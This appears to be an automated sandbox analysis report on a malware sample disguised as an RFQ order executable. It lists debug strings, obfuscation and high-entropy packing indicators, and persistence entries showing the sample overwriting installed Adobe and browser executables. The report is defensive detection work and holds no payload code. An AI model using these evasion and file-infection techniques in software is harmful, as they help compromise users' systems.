Source:	Binary string: 64BitMAPIBroker.pdb source: alg.exe, 00000003.00000003.1646234871.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdbGCTL source: elevation_service.exe, 0000000A.00000003.2468045402.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000003.00000003.1801207586.0000000001440000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000003.00000003.1632221337.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000003.00000003.1562647186.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000003.00000003.1637197730.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000003.00000003.1585909463.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000003.00000003.1667592386.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wsymbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDBs source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 00000003.00000003.1659027257.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb` source: alg.exe, 00000003.00000003.1281053363.0000000001640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000003.00000003.1677652221.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1686851287.0000000000530000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: exhilaratingly.exe, 00000004.00000003.1250656457.00000000049D0000.00000004.00001000.00020000.00000000.sdmp, exhilaratingly.exe, 00000004.00000003.1251704935.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, exhilaratingly.exe, 00000014.00000003.1386854712.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, exhilaratingly.exe, 00000014.00000003.1372833431.0000000004900000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000003.00000003.1593228986.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdb source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000003.1226639947.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\RegSvcs.pdb* source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdb source: elevation_service.exe, 0000000A.00000003.2468045402.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: elevation_service.exe, 0000000A.00000003.2441683485.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdbGCTL source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000003.1226639947.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: elevation_service.exe, 0000000A.00000003.2462788704.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 00000003.00000003.1418745424.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\RegSvcs.pdb source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdb source: alg.exe, 00000003.00000003.1780210490.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000003.00000003.1637197730.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000003.00000003.1593228986.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000003.00000003.1780210490.0000000001450000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Source: alg.exe.0.dr

Static PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress,

0_2_00404B37

Source: AppVClient.exe.0.dr

Static PE information: real checksum: 0xcd10f should be: 0x151e0d

Source: armsvc.exe.0.dr	Static PE information: section name: .didat
Source: alg.exe.0.dr	Static PE information: section name: .didat
Source: OfficeC2RClient.exe.3.dr	Static PE information: section name: .didat
Source: OfficeC2RClient.exe.3.dr	Static PE information: section name: .detourc
Source: plugin-container.exe.3.dr	Static PE information: section name: .00cfg
Source: plugin-container.exe.3.dr	Static PE information: section name: .voltbl
Source: private_browsing.exe.3.dr	Static PE information: section name: .00cfg
Source: private_browsing.exe.3.dr	Static PE information: section name: .voltbl
Source: updater.exe.3.dr	Static PE information: section name: .00cfg
Source: updater.exe.3.dr	Static PE information: section name: .voltbl
Source: updater.exe.3.dr	Static PE information: section name: _RDATA
Source: officesvcmgr.exe.3.dr	Static PE information: section name: .didat
Source: chrome_pwa_launcher.exe.3.dr	Static PE information: section name: .gxfg
Source: chrome_pwa_launcher.exe.3.dr	Static PE information: section name: .retplne
Source: chrome_pwa_launcher.exe.3.dr	Static PE information: section name: LZMADEC
Source: chrome_pwa_launcher.exe.3.dr	Static PE information: section name: _RDATA
Source: elevated_tracing_service.exe.3.dr	Static PE information: section name: .gxfg
Source: elevated_tracing_service.exe.3.dr	Static PE information: section name: .retplne
Source: elevated_tracing_service.exe.3.dr	Static PE information: section name: CPADinfo
Source: elevated_tracing_service.exe.3.dr	Static PE information: section name: _RDATA
Source: elevated_tracing_service.exe.3.dr	Static PE information: section name: malloc_h
Source: chrmstp.exe.3.dr	Static PE information: section name: .gxfg
Source: chrmstp.exe.3.dr	Static PE information: section name: .retplne
Source: chrmstp.exe.3.dr	Static PE information: section name: .rodata
Source: chrmstp.exe.3.dr	Static PE information: section name: CPADinfo
Source: chrmstp.exe.3.dr	Static PE information: section name: LZMADEC
Source: chrmstp.exe.3.dr	Static PE information: section name: _RDATA
Source: chrmstp.exe.3.dr	Static PE information: section name: malloc_h
Source: updater.exe0.3.dr	Static PE information: section name: CPADinfo
Source: updater.exe0.3.dr	Static PE information: section name: malloc_h
Source: elevation_service.exe.3.dr	Static PE information: section name: .00cfg
Source: elevation_service.exe.3.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe.3.dr	Static PE information: section name: .retplne
Source: elevation_service.exe.3.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe.3.dr	Static PE information: section name: malloc_h
Source: maintenanceservice.exe.3.dr	Static PE information: section name: .00cfg
Source: maintenanceservice.exe.3.dr	Static PE information: section name: .voltbl
Source: maintenanceservice.exe.3.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe0.3.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe0.3.dr	Static PE information: section name: .retplne
Source: elevation_service.exe0.3.dr	Static PE information: section name: _RDATA
Source: Acrobat.exe.3.dr	Static PE information: section name: .didat
Source: Acrobat.exe.3.dr	Static PE information: section name: _RDATA
Source: unpack200.exe.3.dr	Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.3.dr	Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.3.dr	Static PE information: section name: .gxfg
Source: ie_to_edge_stub.exe.3.dr	Static PE information: section name: .retplne
Source: ie_to_edge_stub.exe.3.dr	Static PE information: section name: _RDATA
Source: AcroCEF.exe.3.dr	Static PE information: section name: .didat
Source: AcroCEF.exe.3.dr	Static PE information: section name: _RDATA
Source: SingleClientServicesUpdater.exe.3.dr	Static PE information: section name: .didat
Source: SingleClientServicesUpdater.exe.3.dr	Static PE information: section name: _RDATA
Source: cookie_exporter.exe.3.dr	Static PE information: section name: .00cfg
Source: cookie_exporter.exe.3.dr	Static PE information: section name: .gxfg
Source: cookie_exporter.exe.3.dr	Static PE information: section name: .retplne
Source: cookie_exporter.exe.3.dr	Static PE information: section name: _RDATA
Source: identity_helper.exe.3.dr	Static PE information: section name: .00cfg
Source: identity_helper.exe.3.dr	Static PE information: section name: .gxfg
Source: identity_helper.exe.3.dr	Static PE information: section name: .retplne
Source: identity_helper.exe.3.dr	Static PE information: section name: _RDATA
Source: identity_helper.exe.3.dr	Static PE information: section name: malloc_h
Source: setup.exe.3.dr	Static PE information: section name: .00cfg
Source: setup.exe.3.dr	Static PE information: section name: .gxfg
Source: setup.exe.3.dr	Static PE information: section name: .retplne
Source: setup.exe.3.dr	Static PE information: section name: LZMADEC
Source: setup.exe.3.dr	Static PE information: section name: _RDATA
Source: setup.exe.3.dr	Static PE information: section name: malloc_h

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00428945 push ecx; ret		0_2_00428958
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00402F12 push es; retf		0_2_00402F13
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00BB61EA push esi; retf		0_2_00BB61FA
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00BB6619 push esi; retf		0_2_00BB661A
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02F8520C push 02F8528Fh; ret		0_2_02F8522D
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02F8B180 push 02F8B0CAh; ret		0_2_02F8B061
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02F8B180 push 02F8B30Dh; ret		0_2_02F8B1E6
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02F8B180 push 02F8B2F2h; ret		0_2_02F8B262
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02F8B180 push 02F8B255h; ret		0_2_02F8B2ED
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02F8B180 push 02F8B2D0h; ret		0_2_02F8B346
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02F8B180 push 02F8B37Fh; ret		0_2_02F8B3B7
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02FA8550 push 02FA852Eh; ret		0_2_02FA7F3A
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02FA8550 push 02FA8514h; ret		0_2_02FA7F66
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02FA8550 push 02FA7E66h; ret		0_2_02FA8057
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02FA8550 push 02FA817Ah; ret		0_2_02FA808B
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02FA8550 push 02FA82E5h; ret		0_2_02FA80D9
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02FA8550 push 02FA826Ah; ret		0_2_02FA819E
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02FA8550 push 02FA849Ch; ret		0_2_02FA81E4
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02FA8550 push 02FA8321h; ret		0_2_02FA82E0
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02FA8550 push 02FA7FBFh; ret		0_2_02FA831F
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02FA8550 push 02FA7FA8h; ret		0_2_02FA834C
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02FA8550 push 02FA84BAh; ret		0_2_02FA83E2
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02FA8550 push 02FA8426h; ret		0_2_02FA84D8
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02FA8550 push 02FA8075h; ret		0_2_02FA84FD
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02FA8550 push 02FA808Ch; ret		0_2_02FA8512
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02FA8550 push 02FA8D45h; ret		0_2_02FA87D3
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02FA8550 push 02FA8AB5h; ret		0_2_02FA8B13
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02FA8550 push 02FA8784h; ret		0_2_02FA8CA1
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02FA8550 push 02FA8DC9h; ret		0_2_02FA8E1C
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02FA8550 push 02FA8D14h; ret		0_2_02FA8E2E
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_02FA8550 push 02FA8674h; ret		0_2_02FA8E4D

Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Static PE information: section name: .reloc entropy: 7.931587829692506
Source: exhilaratingly.exe.0.dr	Static PE information: section name: .reloc entropy: 7.931587829692506
Source: AppVClient.exe.0.dr	Static PE information: section name: .reloc entropy: 7.936514167669467
Source: OfficeC2RClient.exe.3.dr	Static PE information: section name: .reloc entropy: 7.716516490263077
Source: Aut2exe.exe.3.dr	Static PE information: section name: .rsrc entropy: 7.800656585538328
Source: Aut2exe_x64.exe.3.dr	Static PE information: section name: .rsrc entropy: 7.800509028200441
Source: AutoIt3_x64.exe.3.dr	Static PE information: section name: .reloc entropy: 7.943938710340782
Source: officesvcmgr.exe.3.dr	Static PE information: section name: .reloc entropy: 7.9372275219955215
Source: chrome_pwa_launcher.exe.3.dr	Static PE information: section name: .reloc entropy: 7.941704479049093
Source: elevated_tracing_service.exe.3.dr	Static PE information: section name: .reloc entropy: 7.937521429957238
Source: chrmstp.exe.3.dr	Static PE information: section name: .reloc entropy: 7.935927058600113
Source: updater.exe0.3.dr	Static PE information: section name: .reloc entropy: 7.878683588461651
Source: elevation_service.exe.3.dr	Static PE information: section name: .reloc entropy: 7.94596991768073
Source: SciTE.exe.3.dr	Static PE information: section name: .reloc entropy: 7.912342146177023
Source: jucheck.exe.3.dr	Static PE information: section name: .reloc entropy: 7.931095081946931
Source: jusched.exe.3.dr	Static PE information: section name: .reloc entropy: 7.9360655841269905
Source: elevation_service.exe0.3.dr	Static PE information: section name: .reloc entropy: 7.9451535749911155
Source: 7zFM.exe.3.dr	Static PE information: section name: .reloc entropy: 7.932155908951415
Source: 7zG.exe.3.dr	Static PE information: section name: .reloc entropy: 7.92770181237919
Source: Acrobat.exe.3.dr	Static PE information: section name: .reloc entropy: 7.940560199013122
Source: AcroCEF.exe.3.dr	Static PE information: section name: .reloc entropy: 7.937574682899404
Source: SingleClientServicesUpdater.exe.3.dr	Static PE information: section name: .reloc entropy: 7.943720789696338
Source: identity_helper.exe.3.dr	Static PE information: section name: .reloc entropy: 7.940744376156054
Source: setup.exe.3.dr	Static PE information: section name: .reloc entropy: 7.944754096051668

Persistence and Installation Behavior

Source: C:\Windows\System32\alg.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\d225894719a6adcd.bin

Jump to behavior

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe			Jump to behavior
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe			Jump to behavior
